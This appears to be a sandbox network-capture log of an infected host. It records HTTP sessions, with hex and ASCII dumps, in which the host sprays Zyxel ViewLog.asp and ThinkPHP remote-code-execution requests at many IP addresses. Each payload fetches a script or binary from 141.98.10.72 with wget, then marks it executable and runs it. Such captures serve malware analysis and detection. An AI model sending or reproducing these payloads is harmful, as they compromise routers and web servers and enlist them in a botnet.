Feb 14, 2024 09:29:21.915750027 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Wed, 14 Feb 2024 08:03:32 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
207	192.168.2.15	43932	85.89.232.215	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.683109045 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
208	192.168.2.15	34180	31.44.134.81	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.696233988 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
209	192.168.2.15	36708	94.187.105.21	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.707484961 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
210	192.168.2.15	46892	95.86.95.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:21.717437983 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
211	192.168.2.15	39906	112.167.233.6	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.020632029 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:22.298949003 CET	155	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 345 Connection: close Date: Wed, 14 Feb 2024 08:29:22 GMT Server: lighttpd/1.4.55
Feb 14, 2024 09:29:22.298969030 CET	345	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

Session ID	Source IP	Source Port	Destination IP	Destination Port
212	192.168.2.15	36342	112.159.70.238	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.049211025 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:22.358508110 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 14 Feb 2024 08:29:21 GMT Server: lighttpd/1.4.33 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
213	192.168.2.15	59886	112.45.120.187	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.114845037 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:22.488478899 CET	481	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Wed, 14 Feb 2024 08:29:22 GMT Content-Type: text/html Content-Length: 249 Connection: close Via: cache6.cn6632[,0] Timing-Allow-Origin: * EagleId: 0000000017078993623086328e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
214	192.168.2.15	59888	112.45.120.187	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.117429972 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:22.493874073 CET	481	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Wed, 14 Feb 2024 08:29:22 GMT Content-Type: text/html Content-Length: 249 Connection: close Via: cache8.cn6632[,0] Timing-Allow-Origin: * EagleId: 0000000017078993623083927e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
215	192.168.2.15	55914	31.12.75.157	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.326268911 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
216	192.168.2.15	53758	94.130.225.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.405056000 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:22.606607914 CET	498	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:22 GMT Server: Apache/2.4.53 (Debian) Content-Length: 304 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.53 (Debian) Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
217	192.168.2.15	47952	31.131.118.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.446533918 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:22.690109015 CET	224	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
218	192.168.2.15	47514	94.120.42.222	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.449443102 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
219	192.168.2.15	44014	94.120.51.29	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.451316118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
220	192.168.2.15	42252	112.74.32.155	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.833929062 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:23.178036928 CET	512	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 345 Connection: close Date: Wed, 14 Feb 2024 08:29:22 GMT Server: lighttpd/1.4.53 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
221	192.168.2.15	41844	31.136.52.162	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.834897041 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
